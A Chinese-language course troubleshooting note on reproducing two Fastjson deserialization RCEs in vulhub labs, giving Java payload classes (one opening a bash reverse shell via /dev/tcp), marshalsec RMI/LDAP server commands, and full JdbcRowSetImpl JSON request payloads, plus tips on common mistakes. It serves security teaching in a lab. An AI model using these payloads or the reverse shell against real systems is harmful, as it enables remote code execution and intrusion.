【汇总】Fastjson复现失败总结和思路

# 课程内容回顾
## 1.2.24 RCE CVE-2017-18349
环境：vulhub

这里提供另外一种使用`JNDIExploit-2.0-SNAPSHOT.jar`复现的更简单的方法，不需要编译class和启动HTTP端口
Fastjson 1.2.24 RCE CVE-2017-18349 复现流程
https://wiki.bafangwy.com/doc/876/

### 1、编译class文件
打开cmd，命令：`javac LinuxTouch.java` （在.java的文件目录下执行，注意用`java -version`确认java版本）
```
public class LinuxTouch {
    public LinuxTouch(){
        try{
            Runtime.getRuntime().exec("touch /tmp/fast-success.txt");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        LinuxTouch e = new LinuxTouch();
    }
}
```
### 2、启动HTTP服务
`python -m http.server 8089`

### 3、使用marshalsec启动RMI服务
注意修改HTTP服务器的IP
`java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer  "http://192.168.142.132:8089/#LinuxTouch" 9473`

### 4、payload
修改靶机IP、端口：192.168.142.128:8090
修改RMI服务的IP：192.168.142.132
```
POST / HTTP/1.1
Host: 192.168.142.128:8090
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 146

{
	"b": {
		"@type": "com.sun.rowset.JdbcRowSetImpl",
		"dataSourceName": "rmi://192.168.142.132:9473/LinuxTouch",
		"autoCommit": true
	}
}
```

## 1.2.47 RCE CNVD-2019-22238
环境：vulhub
### 1、编译class文件
打开cmd，命令：`javac LinuxRevers.java` （在.java的文件目录下执行，注意用`java -version`确认java版本）
```
public class LinuxRevers {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/192.168.142.128/9001 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
        }
    }
}
```

### 2、启动HTTP服务
`python -m http.server 8089`

### 3、使用marshalsec启动LDAP服务
`java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.142.132:8089/#LinuxRevers" 9473`

### 4、payload
修改靶机IP、端口：192.168.142.128:8090
修改RMI服务的IP：192.168.142.132

```
POST / HTTP/1.1
Host: 192.168.142.128:8090
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 268

{ 
"a":{ 
"@type":"java.lang.Class", 
"val":"com.sun.rowset.JdbcRowSetImpl" 
}, 
"b":{
 "@type":"com.sun.rowset.JdbcRowSetImpl",
 "dataSourceName":"ldap://192.168.142.132:9473/LinuxRevers",
 "autoCommit":true
} 
}
```

# 问题总结
一般的原因都是payload格式不对。
<font color="red">注意，请求头和请求体之间，只能有一个空行，不能没有空行，也不允许有多个空行</font>

比如这个：request header和request body中间缺了一个空行：
https://www.mashibing.com/question/detail/64854

比如这个：request header和request body中间多了一个空行：
![](/media/202503/2025-03-07_141712_7249950.10234864711722635.png)

# 排查方法
启动docker靶场的时候，不要加-d参数，这样就可以看到服务端输出的日志，根据日志显示内容排查错误。
`docker-compose up`

容器报错不用管，只需要看有没有写文件成功即可
![](/media/202407/2024-07-04_202040_0937040.021804612164671555.png)
参考：
https://www.mashibing.com/question/detail/102490

# 排查流程
在课程里面也讲了几个注意事项，逐一检查：
1、JDK11编译的class放到靶场JDK8的环境，不能运行，必须用JDK8编译
2、java源代码不能有包名（去掉代码中的package name以后再编译）
3、尝试用python启动HTTP而不是Apache（phpstudy）——确保.class文件可以下载
4、HTTP用POST请求，不要用GET
5、#Exploit 名字后面不要写.class
6、kali用jdk8启动`marshalsec-0.0.3-SNAPSHOT-all.jar`
Linux配置JDK
https://wiki.bafangwy.com/doc/518/